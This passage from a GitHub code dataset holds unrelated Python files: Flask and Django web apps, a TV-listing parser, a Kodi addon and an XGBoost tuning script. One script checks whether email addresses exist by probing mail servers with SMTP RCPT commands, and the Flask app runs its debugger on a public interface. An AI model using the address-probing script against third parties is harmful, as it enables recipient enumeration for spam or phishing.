jsonify({\"message\" : f\"Hello, {userName}! Your birthday is in {diff.days} days.\"})\n except IndexError:\n return '''SORRY Page Not Found:\\n\n

NOTE: Username must contain only letters and make sure before GET request use PUT request to add dateOfBirth for username

''' \n\n@app.errorhandler(404)\ndef page_not_found(e):\n return ('''SORRY Page Not Found:\\n\n Hint: This is a RESTful web service! Append a username to the URL after hello (for example: /hello/mayank -d { \"dateOfBirth\" : \"1988-12-01\" }) with data.\\n''')\n\nif __name__==\"__main__\":\n app.run(host='0.0.0.0', port=80, debug=True)","repo_name":"manukoli1986/DevOpsR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"27611539434","text":"############################################################################################################\r\n# TV Data source: TSReader\r\n# Notes:\r\n# parses an XMLTV file from TSReader\r\n#\r\n# REVISION HISTORY:\r\n# 01/11/05 Created\r\n# 07/11/05 2nd attempt :)\r\n# 12/02/07 Now uses smbLib, several smb funcs removed\r\n# GUI config added and overhauled to make it faster.\r\n############################################################################################################\r\n\r\nimport time, os, smb\r\nfrom mytvLib import *\r\nfrom smbLib import ConfigSMB, smbConnect, smbFetchFile, isNewSMBFile\r\nimport mytvGlobals\r\n\r\n__language__ = sys.modules[\"__main__\"].__language__\r\n\r\nCHANNELS_REGEX = 'channel id=\"(.*?)\".*?display-name lang=\"en\">(.*?)<'\r\nCHANNEL_REGEX = 'start=\"(\\d\\d\\d\\d\\d\\d\\d\\d)(\\d\\d\\d\\d\\d\\d)\" stop=\"(\\d+)\".*?title>(.*?)<.*?desc>(.*?)<'\r\nXMLTV_FILE = 'xmltv.xml'\r\n\r\nclass ListingData:\r\n\tdef __init__(self, cache):\r\n\t\tdebug(\"ListingData.__init__\")\r\n\r\n\t\tself.cache = cache\r\n\t\tself.name = os.path.splitext(os.path.basename( __file__))[0]\t# get filename without path & ext\r\n\t\tself.CHANNELS_FILENAME = os.path.join(cache,\"Channels_\"+ self.name + \".dat\")\r\n\t\tself.localSMBFile = os.path.join(cache,XMLTV_FILE)\r\n\t\tself.checkedRemoteFileToday = False\r\n\t\tself.connectionError = False\r\n\t\tself.isConfigured = False\r\n\r\n\t\t# smb vars\r\n\t\tself.remote = None\r\n\t\tself.remoteInfo = None\r\n\t\tself.smbIP = None\r\n\t\tself.smbPath = None\r\n\t\tself.smbRemoteFile = None\r\n\r\n\tdef getName(self):\r\n\t\treturn self.name\r\n\r\n\t# download or load if exists, a list of all available channels.\r\n\t# return: list [chID, chName]\r\n\tdef getChannels(self):\r\n\t\tdebug(\"> ListingData.getChannels()\")\r\n\t\tchannelList = []\r\n\t\tif self.isConfigured:\r\n\t\t\t# fetch file if not exists\r\n\t\t\tif not fileExist(self.CHANNELS_FILENAME):\r\n\t\t\t\t# if no local XML file, fetch from SMB\r\n\t\t\t\tif not fileExist(self.localSMBFile):\r\n\t\t\t\t\tself.getRemoteFile()\r\n\r\n\t\t\t\t# extract data from file using regex - this is specific to this file format\r\n\t\t\t\tdata = readFile(self.localSMBFile)\r\n\t\t\t\tif data:\r\n\t\t\t\t\tmatches = findAllRegEx(data, CHANNELS_REGEX)\r\n\t\t\t\t\tchannelList = writeChannelsList(self.CHANNELS_FILENAME, matches)\r\n\t\t\telse:\r\n\t\t\t\t# read in [channel id, channel name]\r\n\t\t\t\tchannelList = readChannelsList(self.CHANNELS_FILENAME)\r\n\r\n\t\tdebug(\"< ListingData.getChannels()\")\r\n\t\treturn channelList\r\n\r\n\r\n\t# download channel data, using either dayDelta or dataDate.\r\n\t# filename = filename to save downloaded data file as.\r\n\t# chID = unique channel ID, used to reference channel in URL.\r\n\t# chName = display name of channel\r\n\t# dayDelta = day offset from today. ie 0 is today, 1 is tomorrow ...\r\n\t# fileDate = use to calc programme start time in secs since epoch.\r\n\t# return Channel class or -1 if http fetch error, or None for other\r\n\tdef getChannel(self, filename, chID, chName, dayDelta, fileDate):\r\n\t\tdebug(\"> ListingData.getChannel() dayDelta: %s chID=%s fileDate=%s\" % (dayDelta,chID,fileDate))\r\n\t\tprogList = []\r\n\t\tif self.isConfigured:\r\n\t\t\tif not self.checkedRemoteFileToday:\r\n\t\t\t\tself.getRemoteFile(False) # fetch only if newer\r\n\t\t\t\tself.checkedRemoteFileToday = True\r\n\r\n\t\t\tif fileExist(self.localSMBFile):\r\n\t\t\t\tprogList = self.createChannelFiles(chID, int(fileDate))\r\n\t\t\telse:\r\n\t\t\t\tdebug(\"file missing \" + self.localSMBFile)\r\n\r\n\t\tdebug(\"< ListingData.getChannel()\")\r\n\t\treturn progList\r\n\r\n\t############################################################################################################\r\n\t# determine highest start date for any channel.\r\n\t# this will help prevent unnwanted processing when curr. date nearing end of\r\n\t# dates contained with XML\r\n\t############################################################################################################\r\n#\tdef findHeighestStartDate(self, data):\r\n#\t\tdebug(\"> ListingData.findHeighestStartDate() current self.highestDate=\"+str(self.highestDate))\r\n#\t\tregex = 'start=\\\"(\\d\\d\\d\\d\\d\\d\\d\\d)'\r\n#\t\tmatches = findAllRegEx(data, regex)\r\n#\t\tif matches:\r\n#\t\t\tmatches.sort()\r\n#\t\t\tlastMatch= int(matches[-1])\r\n#\t\t\tif lastMatch > self.highestDate:\r\n#\t\t\t\tself.highestDate = lastMatch\r\n#\t\tdebug(\"< ListingData.findHeighestStartDate() new self.highestDate=\"+str(self.highestDate))\r\n\r\n\t\t\r\n\t############################################################################################################\r\n\t# extract data from file using regex - this is specific to TSReader file format\r\n\tdef createChannelFiles(self, chID, searchDate):\r\n\t\tdebug(\"> ListingData.createChannelFiles() chID=%s searchDate=%s\" % (chID, searchDate))\r\n\t\tprogList = []\r\n\r\n\t\tdialogProgress.update(0, __language__(312))\r\n\t\tdata = readFile(self.localSMBFile)\r\n\t\tif data:\r\n\t\t\tmatches = parseDocList(data, CHANNEL_REGEX, 'channel id=\"'+chID,'channel id=')\r\n\t\t\tfor prog in matches:\r\n\t\t\t\tstartDate = prog[0]\t\t\t\t\t\t\t# YYYYMMDD\r\n\t\t\t\tif int(startDate) < searchDate:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\telif (int(startDate) > searchDate):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\tstartTime = prog[1]\t\t\t\t\t\t# HHMMSS\r\n\t\t\t\t\tendDateTime = prog[2]\t\t\t\t\t# YYYYMMDDHHMM\r\n\t\t\t\t\ttitle = decodeEntities(prog[3])\r\n\t\t\t\t\tdesc = decodeEntities(prog[4])\r\n\t\t#\t\t\tprint startDate, startTime, endDateTime, title\r\n\t\t\t\t\t# calc programme start time in secs since epoch based on programme date\r\n\t\t\t\t\tstartTimeSecs = time.mktime(time.strptime(startDate+startTime,\"%Y%m%d%H%M%S\"))\r\n\t\t\t\t\tendTimeSecs = time.mktime(time.strptime(endDateTime,\"%Y%m%d%H%M%S\"))\r\n\t\t\t\t\tprogList.append( {\r\n\t\t\t\t\t\t\tTVData.PROG_STARTTIME : float(startTimeSecs),\r\n\t\t\t\t\t\t\tTVData.PROG_ENDTIME : float(endTimeSecs),\r\n\t\t\t\t\t\t\tTVData.PROG_TITLE : title,\r\n\t\t\t\t\t\t\tTVData.PROG_DESC : desc\r\n\t\t\t\t\t\t} )\r\n\r\n\t\t\tif progList:\r\n\t\t\t\tprogList = setChannelEndTimes(progList)\t\t# update endtimes\r\n\r\n\t\tdel data\r\n\t\tdebug(\"< ListingData.createChannelFiles() progs count=%s\" % len(progList))\r\n\t\treturn progList\r\n\r\n\t############################################################################################################\r\n\t# create a SMB connection and fetch remote file\r\n\tdef getRemoteFile(self, fetchAlways=True):\r\n\t\tdebug(\"> ListingData().getRemoteFile() fetchAlways=%s\" % fetchAlways)\r\n\t\tdownloaded = False\r\n\r\n\t\tif not self.connectionError:\r\n\t\t\tif not self.remote or not self.remoteInfo:\r\n\t\t\t\tself.remote, self.remoteInfo = smbConnect(self.smbIP, self.smbPath)\r\n\r\n\t\t\tif self.remote and self.remoteInfo:\r\n\t\t\t\tif fetchAlways or isNewSMBFile(self.remote, self.remoteInfo, self.localSMBFile, self.smbRemoteFile):\r\n\t\t\t\t\tdownloaded = smbFetchFile(self.remote, self.remoteInfo, self.localSMBFile, self.smbRemoteFile, silent=False)\r\n\t\t\t\t\tif downloaded == None:\r\n\t\t\t\t\t\tself.connectionError = True\r\n\t\t\telse:\r\n\t\t\t\tself.connectionError = True\r\n\r\n\t\tdebug(\"< ListingData.getRemoteFile() downloaded=%s connectionError=%s\" % (downloaded, self.connectionError))\r\n\t\treturn downloaded\r\n\r\n\r\n\t############################################################################################################\r\n\tdef config(self, reset=False):\r\n\t\tdebug(\"> ListingData.config() reset=%s\" % reset)\r\n\r\n\t\ttitle = \"%s - %s\" % (self.name, __language__(976))\r\n\t\tconfigSMB = ConfigSMB(title, fnTitle=__language__(977), fnDefaultValue=XMLTV_FILE)\r\n\t\tif reset:\r\n\t\t\tconfigSMB.ask()\r\n\r\n\t\tsmbDetails = configSMB.checkAll(silent=True)\r\n\t\tif smbDetails:\r\n\t\t\tself.smbIP, self.smbPath, self.smbRemoteFile = smbDetails\r\n\t\t\tself.isConfigured = True\r\n\t\telse:\r\n\t\t\tself.isConfigured = False\r\n\t\tself.connectionError = False\t# will allow a retry after a config change\r\n\r\n\t\tdebug(\"< ListingData.config() isConfigured=%s\" % self.isConfigured)\r\n\t\treturn self.isConfigured\r\n","repo_name":"amitca71/xbmc-scripting","sub_path":"myTV/resources/datasource/pc_TSReader.py","file_name":"pc_TSReader.py","file_ext":"py","file_size_in_byte":7456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"3932650416","text":"from zope.interface import Interface\nfrom zope import schema\n\nfrom zope.i18nmessageid import Message as _ # requires explicit domain\n\nclass IRSSListing(Interface):\n \"\"\"A content type, which displays an RSS feed in the same way as\n RSS Portlet does.\n \"\"\"\n\n # Cloned from: plone.app.portlets.portlets.rss.IRSSPortlet\n count = schema.Int(title=_(u'Number of items to display', domain=\"plone\"),\n description=_(u'How many items to list.', domain=\"plone\"),\n required=True,\n default=5)\n url = schema.Text(title=_(u'List of RSS feed URLs', domain=\"jyu.rsslisting\"),\n description=_(u'List of links to the RSS feeds to display. Please, enter only one link per line.',\n domain=\"jyu.rsslisting\"),\n required=True,\n default=u'')\n timeout = schema.Int(title=_(u'Feed reload timeout', domain=\"plone\"),\n description=_(u'Time in minutes after which the feed should be reloaded.', domain=\"plone\"),\n required=True,\n default=100) \n\n showMoreEnabled = schema.Bool(\n title=_(u'Show link to show more', domain=\"jyu.rsslisting\"),\n description=_(u'When set there will be link at the end to show all the results. If there is more than one RSS feed defined, only the first RSS feed will be linked.', domain=\"jyu.rsslisting\"),\n required = False,\n )\n","repo_name":"Gomez/jyu.rsslisting","sub_path":"jyu/rsslisting/interfaces/rsslisting.py","file_name":"rsslisting.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"71499742981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 2 12:18:47 2019\n\n@author: Dave\n\"\"\"\n\n\nfrom zipfile import ZipFile\nimport glob\nimport os\nimport re\nimport string\n\ndef BuildConsolidatedFile(datadir):\n matchstring = '^[^a-zA-Z]*(?P[a-zA-Z]+)'\n\n rg = re.compile(matchstring)\n removepunc = string.punctuation[:6] + string.punctuation[7:12] + string.punctuation[13:]\n HEoutfile = open(os.path.join(datadir,'HE_Characters.txt'), 'w')\n SHEoutfile = open(os.path.join(datadir,'SHE_Characters.txt'), 'w')\n for filepath in glob.glob(os.path.join(datadir,'*.zip')):\n #open the zip files to read the files\n \n zipfile = ZipFile(filepath)\n \n for fname in zipfile.infolist():\n if not fname.is_dir() and not fname.filename.startswith('__MACOSX'): \n with zipfile.open(fname) as f:\n try: \n for i, l in enumerate(f):\n \n s = l.decode('ascii').strip()\n m = rg.match(s)\n \n outstring = s[m.start('MTCH'):].lower().translate(str.maketrans('','',removepunc))\n #check if a match exists\n if m.group('MTCH').lower() == 'he':\n #parse out the string to start with the part found\n HEoutfile.write(outstring)\n HEoutfile.write(\"\\n\")\n if m.group('MTCH').lower() == 'she':\n #parse out the string to start with the part found \n SHEoutfile.write(outstring)\n SHEoutfile.write(\"\\n\")\n except:\n pass\n \n HEoutfile.close()\n SHEoutfile.close()\n \n return {\"hefile\":os.path.join(datadir,'HE_Characters.txt'),\n \"shefile\":os.path.join(datadir,'SHE_Characters.txt')}\n\n\n","repo_name":"debreceni/FE595_BLPCharacters","sub_path":"HeroFiles.py","file_name":"HeroFiles.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"15062108465","text":"import warnings\nwarnings.filterwarnings('ignore')\n\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport optuna\nfrom optuna.samplers import TPESampler\n\nimport xgboost as xgb\nfrom xgboost import XGBClassifier\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import log_loss\n\nSEED = 42\n\ndata = pd.read_csv(\"C:/Users/na018/Desktop/capstone/2023-1-Capstone-Design/iris.csv\")\ndata.drop('Id', axis=1, inplace=True)\n\ncategorical_cols = []\nfor col in data.columns:\n if data[col].dtype == 'object':\n categorical_cols.append(col)\n\nif categorical_cols:\n labelencoder = LabelEncoder()\n for col in categorical_cols:\n data[col] = labelencoder.fit_transform(data[col])\n\nX = data.drop('Species', axis=1)\ny = data['Species']\n\nlabelencoder_y = LabelEncoder()\ny = labelencoder_y.fit_transform(y)\n\nscaler = MinMaxScaler()\nX = scaler.fit_transform(X)\n\ndef objective(trial):\n params = {'reg_lambda': trial.suggest_float(\"reg_lambda\", 1e-5, 1.0),\n 'reg_alpha': trial.suggest_float(\"reg_alpha\", 1e-5, 1.0),\n 'max_depth': trial.suggest_int(\"max_depth\", 4,100),\n 'colsample_bytree': trial.suggest_float(\"colsample_bytree\", 0.1, 1),\n 'subsample': trial.suggest_loguniform(\"subsample\", 0.5, 1),\n 'learning_rate': trial.suggest_loguniform(\"learning_rate\", 1e-5, 1e-1),\n 'n_estimators': trial.suggest_int(\"n_estimators\", 100, 3000),\n 'min_child_samples': trial.suggest_int(\"min_child_samples\", 5, 100),\n 'random_state': 42, 'num_class': 3}\n \n x_train, x_valid, y_train, y_valid = train_test_split(X, y, test_size=0.1, random_state=SEED, stratify=y)\n \n dtrain = xgb.DMatrix(x_train, label=y_train)\n dvalid = xgb.DMatrix(x_valid, label=y_valid)\n \n model = XGBClassifier(**params)\n model.fit(x_train, y_train, eval_set=[(x_valid, y_valid)], eval_metric='mlogloss', verbose=0, early_stopping_rounds=100)\n \n predictions = model.predict(x_valid)\n \n score = f1_score(y_valid, predictions, average='macro')\n \n return score\n\nsampler = TPESampler(seed=SEED)\nstudy = optuna.create_study(direction=\"maximize\", sampler=sampler)\nstudy.optimize(objective, n_trials=100)\n\nbest_params = study.best_params\nprint(best_params)","repo_name":"cain0709/2023-1-Capstone-Design","sub_path":"generated_model/iris_lgbm_1684680601.py","file_name":"iris_lgbm_1684680601.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"7612163","text":"import math\n\nfrom flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\n\nfrom repopip.local_repo.repo import Repo\nfrom repopip.local_repo.configurator import Configurator\nfrom repopip.translations.translator import Translator\n\nrepo = Repo()\ntranslator = Translator()\ntranslations = translator.translations\napp_lang = 'en'\n\nbp = Blueprint('site', __name__)\n\n@bp.route('/')\n@bp.route('/')\ndef index(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['index'], **translations[lang]['footer']}\n \n return render_template('pages/index.html.j2', **translation, terminal = True)\n\n\n@bp.route('/contact')\n@bp.route('//contact')\ndef contact(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['contact'], **translations[lang]['footer']}\n return render_template('pages/contact.html.j2', **translation)\n\n\n@bp.route('/packages')\n@bp.route('//packages')\ndef packages(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['packages'], **translations[lang]['footer']}\n \n repo.loadPackages()\n packages = repo.packages\n repo_len = len(packages)\n total = (repo_len, repo.total_versions)\n\n if(request.args.get('all')):\n return render_template('pages/packages.html.j2', **translation, packages_dict = packages, total = total, size = repo.size)\n\n page = request.args.get('page')\n if(page is not None and page.isnumeric()):\n page = int(page)\n else:\n page = 1\n\n step = 12\n total_pages = math.ceil(repo_len/step)\n start = page * step - step\n end = start + step\n slice_packages = dict(list(packages.items())[start:end])\n data_pages = {\n 'current': page,\n 'total_pages': total_pages\n }\n return render_template('pages/packages.html.j2', **translation, packages_dict = slice_packages, total = total, size = repo.size, data_pages = data_pages)\n\n\n@bp.route('/config', methods=['GET', 'POST'])\n@bp.route('//config', methods=['GET', 'POST'])\ndef configuration(lang = app_lang):\n if(lang not in translator.translations):\n lang = app_lang\n translation = {**translations[lang]['nav'], **translations[lang]['configuration'], **translations[lang]['footer']}\n\n if(request.method == \"POST\"):\n try:\n if(request.json.get('config') == 'standar'):\n c = Configurator(request.json.get('level'))\n else:\n c = Configurator(request.json.get('level'), request.json.get('config'))\n\n c.config()\n return { 'result':True }\n except:\n return { 'result':False }\n else:\n configs = Configurator().searchConfigs() \n\n return render_template('pages/configuracion.html.j2', **translation, configs = configs)\n\n@bp.route('/get-configs', methods=['GET', 'POST'])\ndef getConfigs():\n try:\n configs = Configurator().searchConfigs()\n return { 'error': False, 'configs': configs }\n except Exception:\n return { 'error' : True }","repo_name":"luiserp/local_repo","sub_path":"repopip/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"70449603141","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.core.files.base import ContentFile\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom .forms import LoginForm, UserRegistrationForm, UserEditForm, ProfileEditForm\nfrom .models import Profile, Contact\nfrom common.decorators import ajax_required\nfrom actions.utils import create_action\nfrom actions.models import Action\n\n\n# def user_login(request):\n# if request.method == 'POST':\n# form = LoginForm(request.POST)\n# if form.is_valid():\n# cd = form.cleaned_data\n# # 可以定义多个认证后台,Django 内部会逐一调用这些后台的 authenticate 方法来验证用户提供登录凭据的合法性,一旦通过某个后台的验证,表明用户提供的凭据合法,从而允许登录该用户。\n# # 当使用authenticate()函数,Django 会通过每一个定义在AUTHENTICATION_BACKENDS 中的后台一个接一个地���试认证用户,直到其中有一个后台成功的认证,该用户才会停止进行认证。\n# # 只有所有的后台都无法进行用户认证,才不会在你的站点中通过认证。\n# # 使用 authenticate() 方法在数据库对用户进行认证,如果用户认证成功则返回用户对象,否则是 None 。\n# user = authenticate(username=cd['username'], password=cd['password'])\n# if user is not None:\n# # 检查用户是否是激活状态\n# if user.is_active:\n# # login() 方法将用户设置到当前session中然后返回成功消息\n# login(request, user)\n# return redirect(reverse('account:dashboard'))\n# else:\n# form = LoginForm()\n# return render(request, 'account/login.html', {'form': form})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(data=request.POST)\n profile_form = ProfileEditForm(data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n new_user = user_form.save(commit=False)\n # User 模型的set_password() 方法将用户的原密码进行加密后再保存\n new_user.set_password(user_form.cleaned_data['password'])\n # modelform才有save方法\n new_user.save()\n new_profile = profile_form.save(commit=False)\n new_profile.user = new_user\n new_profile.save()\n create_action(new_user, '注册成功')\n return render(request, 'account/register_done.html', {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n profile_form = ProfileEditForm()\n return render(request, 'account/register.html', {'user_form': user_form, 'profile_form': profile_form})\n\n\n@login_required\ndef edit(request):\n if request.method == 'POST':\n # request.user是UserEditForm这个ModelForm的模型User的实例,ModelForm才有instance=这个参数\n user_form = UserEditForm(instance=request.user, data=request.POST)\n # request.user.profile是Profile模型的实例,用户详细信息表单,包括上传的文件,ImageField使用request.FILES获取\n profile_form = ProfileEditForm(instance=request.user.profile, data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, '资料更新成功')\n else:\n messages.error(request, '资料更新失败,请检查各字段是否符合要求')\n else:\n user_form = UserEditForm(instance=request.user)\n try:\n # instance=request.user.profile 查询数据库中已存在的用户详细信息,如果查询不到会报错RelatedObjectDoesNotExist\n profile_form = ProfileEditForm(instance=request.user.profile)\n except Exception:\n profile_form = ProfileEditForm()\n return render(request, 'account/edit.html', {'user_form': user_form, 'profile_form': profile_form})\n\n\n# login_required 装饰器(decorator)会检查当前用户是否通过认证,如果用户通过认证,它会执行装饰的视图(view)\n# 如果用户没有通过认证,它会把用户重定向到带有名为 next 的 GET 参数的登录 URL,该 GET 参数保存的变量为用户当前尝试访问的页面 URL\n@login_required\ndef dashboard(request):\n # 当前的用户被设置在request对象中,可以通过使用request.user在模板中访问用户信息,未认证的用户在request中被设置成 AnonymousUser 的实例\n # 除自己以外所有用户的动态\n actions = Action.objects.exclude(user=request.user)\n # 根据request.user获取following,然后返回这些following的id,values_list根据'id'返回元祖,flat=True将元祖展开为列表\n following_ids = request.user.following.values_list('id', flat=True)\n if following_ids:\n # 如果用户正在关注他人,获取用户所关注的人的动态\n # select_related()方法允许取回关联对象,该方法将会转化成单独的、更加复杂的查询集,但是存取这些关联对象时可以避免额外的查询\n # select_related()方法是给ForeignKey(一对多)和OneToOne(一对一)字段使用的,通过在SELECT语句中执行SQL JOIN并且包含关联对象的字段实现\n # 使用user__profile(双下划线)实现在单独的SQL查询中连接profile表,如果调用select_related()而不传入任何参数,会取回所有ForeignKey关系的对象\n # select_related()无法给ManyToMany(多对多)或者倒转ForeignKey(多对一)字段使用,prefetch_realted方法在select_related()方法支持的关系上增加支持多对多和多对一的关系\n # prefetch_related()方法为每种关系执行单独的查询然后对各个结果进行连接,还支��对GeneriRelation和GenericForeignKey的预读\n actions = actions.filter(user_id__in=following_ids).select_related('user', 'user__profile').prefetch_related(\n 'target')\n # 如果用户没有关注任何人,获取最新10条除自己外所有人的动态,不使用order_by(),因为已经在Action模型的Meta中设置过排序规则\n actions = actions[:10]\n return render(request, 'account/dashboard.html', {'section': 'dashboard'})\n\n\n# 查询用户,is_active表示账户是否可用\n@login_required\ndef user_list(request):\n users = User.objects.filter(is_active=True)\n return render(request, 'account/user/list.html', {'section': 'people', 'users': users})\n\n\n# 查询用户详细信息,当通过传入的用户名无法找到用户,视图会返回HTTP 404响应\n@login_required\ndef user_detail(request, username):\n user = get_object_or_404(User, username=username, is_active=True)\n return render(request, 'account/user/detail.html', {'section': 'people', 'user': user})\n\n\n# 因为用户的多对多关系使用定制的中间模型,所以ManyToManyField管理器默认的add()和remove()方法将不可用\n# 使用Contact模型来创建和删除用户关系,本函数仍然使用user_detail视图的模板\n@ajax_required\n@require_POST\n@login_required\ndef user_follow(request):\n user_id = request.POST.get('id')\n action = request.POST.get('action')\n if user_id and action:\n try:\n user = User.objects.get(id=user_id)\n # 如果AJAX发送的是follow\n if action == 'follow':\n # get_or_create方法先查询,如果未查询到则创建\n Contact.objects.get_or_create(user_from=request.user, user_to=user)\n create_action(request.user, '关注了', user)\n # 如果AJAX发送的是unfollow\n else:\n Contact.objects.filter(user_from=request.user, user_to=user).delete()\n return JsonResponse({'status': 'ok'})\n except User.DoesNotExist:\n return JsonResponse({'status': 'ko'})\n return JsonResponse({'status': 'ko'})\n","repo_name":"Huanghibo/Django_By_Example","sub_path":"bookmarks/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"28819134137","text":"\nimport argparse\nimport smtplib\nimport dns.resolver\n\n\n\ndef get_mx(hostname):\n try:\n servidor_mx = dns.resolver.resolve(hostname, 'MX')\n except:\n servidor_mx = None\n \n return servidor_mx\n\ndebug = True\n\ndef Validador(email):\n hostname = email[email.find(\"@\") + 1:]\n s = get_mx(hostname)\n\n if s == None:\n print('No se encuentra MX para el dominio {}'.format(hostname))\n return None\n for mx in s:\n servidor = smtplib.SMTP(timeout=10)\n servidor.connect(str(mx.exchange))\n status, _ = servidor.helo()\n \n if status != 250:\n servidor.quit()\n continue\n servidor.mail('')\n status, _ = servidor.rcpt(email)\n if status == 250:\n servidor.quit()\n return True\n \n servidor.quit()\n \n return False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"\"\"DESCRIPCIÓN: Este script comprueba si una dirección de correo existe en un MX (intercambiador de correo).\"\"\")\n grupo = parser.add_mutually_exclusive_group()\n grupo.add_argument('-e', required=False, default=None, help='Dirección de email a comprobar.')\n grupo.add_argument('-f', required=False, default=None, help='Pasar la Ruta de un archivo en el que se alojan correos.')\n parser.add_argument('-s', required=False, default=None, help='Ruta de un archivo en el que se imprimiran los correos validos.')\n argumentos = parser.parse_args()\n\n \n if (argumentos.e != None ):\n v = Validador(argumentos.e)\n if v:\n print(\"El correo {} es valido\".format(argumentos.e))\n else:\n print(\"El correo {} no es valido\".format(argumentos.e))\n elif(argumentos.f != None):\n f2 = open(argumentos.f, \"r\", encoding='utf-8') #obtencion de los emails del archivo pasado por *args\n lines = f2.readlines()\n if(argumentos.s!= None):\n salida = open(argumentos.s,\"w\",encoding=\"utf-8\")\n \n for email in lines:\n \n v = Validador(email[:len(email)-1])\n if(argumentos.s!= None):\n if v:\n salida.write(email)\n else:\n if v:\n print(email[:len(email)-1])\n \n if(argumentos.s!= None):\n salida.close()\n \n ","repo_name":"eloyrj/ScriptPownd","sub_path":"correos.py","file_name":"correos.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"71449901061","text":"# -*- coding: utf-8 -*\nimport urllib, os, sys\n\nfrom resources.lib import channel\n\n__handle__ = int(sys.argv[1])\n\n#if channel.in_xbmc:\n \n #icon = xbmc.translatePath(os.path.join(__home__, 'resources/rtl-tvi.png'))\n\nchannels = {#'rtltvi': {'name': 'RTL-TVI (Broken)', 'icon': 'rtl-tvi.png', 'module': 'rtl'},\n #'clubrtl': {'name': 'Club RTL (Broken)', 'icon': 'club-rtl.png', 'module': 'rtl'},\n #'plugrtl': {'name': 'Plug RTL (Broken)', 'icon': 'plug-rtl.png', 'module': 'rtl'},\n 'rtbf': {'name': 'RTBF', 'icon': 'rtbf-all.png'},\n 'bx1': {'name': 'BX1', 'icon': 'bx1.jpg'},\n 'tvcom': {'name': 'TV Com', 'icon': 'tvcom.jpg'},\n #'vtm': {'name': 'VTM (Broken)', 'icon': 'vtm.jpg'},\n #'een': {'name': 'EEn (Broken)', 'icon': 'een.png'},\n }\n\ndef show_channels():\n channel.addDir('History', None, action='history')\n channel_ids = list(channels.keys())\n channel_ids.sort()\n for channel_id in channel_ids:\n ch = channels[channel_id]\n if channel.in_xbmc:\n icon = xbmc.translatePath(os.path.join(channel.home, 'resources/' + ch['icon']))\n channel.addDir(ch['name'], icon, channel_id=channel_id, action='show_categories')\n else:\n print('%s %s %s ' % (ch['name'], channel_id, 'show_categories'))\n channel.addDir('Settings', None, action='settings')\n \ndef get_params():\n print('Params:')\n print(sys.argv)\n param = {}\n if len(sys.argv) < 3:\n return {}\n paramstring = sys.argv[2]\n if len(paramstring) >= 2:\n params = sys.argv[2]\n cleanedparams = params.replace('?', '')\n if (params[len(params) - 1] == '/'):\n params = params[0:len(params) - 2]\n print(cleanedparams)\n param = dict(urllib.parse.parse_qsl(cleanedparams))\n print(param)\n return param\nprint(\"===============================\\n Video Belgium\\n===============================\")\n\nparams = get_params()\n\naction = params.get('action', False)\nchannel_id = params.get('channel_id')\nprint('channel_id:', channel_id)\n\nif action is False:\n show_channels()\n channel.xbmcplugin.endOfDirectory(__handle__)\nelif action == 'settings':\n import xbmcaddon\n addon = xbmcaddon.Addon()\n addon.openSettings()\nelif action == 'history':\n channel.History().show(channels)\nelif channel_id:\n context = channels[channel_id]\n context.update(params)\n #import sys\n channel_module_name = 'resources.lib.%s' % context.get('module', channel_id)\n __import__(channel_module_name, fromlist=['Channel']).Channel(context)\n #sys.modules[channel_module_name].Channel(context)\n channel.xbmcplugin.endOfDirectory(__handle__)\n","repo_name":"zyphos/belgium-replay-tv","sub_path":"plugin.video.belgium/addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"8"} +{"seq_id":"32910629519","text":"from django.shortcuts import render, reverse, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom importdata.models import TeachersFile, ZipProfileFile\nfrom teachers.models import Teacher, Subject, SubjectTaughtBy\nfrom django.db.utils import IntegrityError\nfrom django.contrib import messages\nimport csv\nimport os\nfrom os.path import isfile, join\nfrom os import listdir\nfrom zipfile import ZipFile\n# Create your views 